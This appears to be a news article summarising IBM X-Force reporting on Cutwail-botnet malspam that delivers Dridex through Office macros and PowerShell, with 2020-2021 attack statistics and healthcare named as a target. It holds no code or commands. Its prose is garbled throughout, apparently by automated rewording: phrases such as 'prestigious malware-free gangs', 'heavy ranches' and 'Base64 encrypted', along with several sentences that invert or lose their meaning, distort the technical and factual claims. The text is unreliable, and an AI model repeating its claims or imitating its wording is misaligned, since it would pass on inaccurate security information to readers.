Cutwail Botnet-Led Dridex and Malicious PowerShell Related Attacks, Increase with new Scripts


IBM X-Force intelligence has observed an increase in the Cutwail botnet-led Dridex-related network attacks. Dridex is shipped via e-mail with booby-trapped macros as a second-stage attacker after the original document or spreadsheet arrives. Recipients who unintentionally trigger the macros, launch malware that will install more malware in a PowerShell script. Currently, in Italy and Japan, X-Force is seen to be examining relatively smaller campaigns. 

Malspam emails are indeed the original infection vector for these threats. Recipients receive unwanted messages, mostly sent via the Cutwail botnet including Microsoft Office file attachments. It was a popular cybercrime spam platform in 2009 and is still distributing spam to prestigious malware-free gangs. Cutwail has been the biggest in its genres. In total, as of June 2020, at least 34% of all X-Force PowerShell attacks have been related to the Dridex payload. The uptick in PowerShell seemed obvious at the beginning of 2020 and began to rise significantly in May 2020. In December 2020, the activity peaks of X-Force recorded an 80 percent raise over the previous six-month duration in the total number of malicious PowerShell attacks. 

In January 2021, it was observed that both PowerShell's attacks and Dridex's integrated attacks saw a sudden decrease, presumably with the end of the campaign, and a new one was launched using the separate macro as well as other scripts.  

In the case of X-Force investigation, the PowerShell function is directed to override the local operation policies and runs a Base64 encrypted command, resulting in a demand to navigate to the so-called Microsoft URL. This script retrieves a malicious file from the typo-squatted region. These basic steps differ per model and campaign. The Dridex payload is the executable file. It masks itself as a hosting service operation and starts to implement its data-robbing techniques to prevent identification. 

If one looks at the sectors most commonly targeted are controlled security networks, X-Force acknowledges that the top goal of the increased rise in PowerShell attacks is health care. Ransomware attacks in many cases tend to compromise hospitals for heavy ranches to shield patients and to restart operations. 

Dridex mainly works with other cybercrime organizations having links in East Europe's powerful criminal arena. In the past, Necurs had been Dridex's leading spamming operation. Dridex stepped on and off of Necurs, holding Emotet as the botnet that paves the way to corporate networks when strategies have shifted from widespread infection to targeted attack.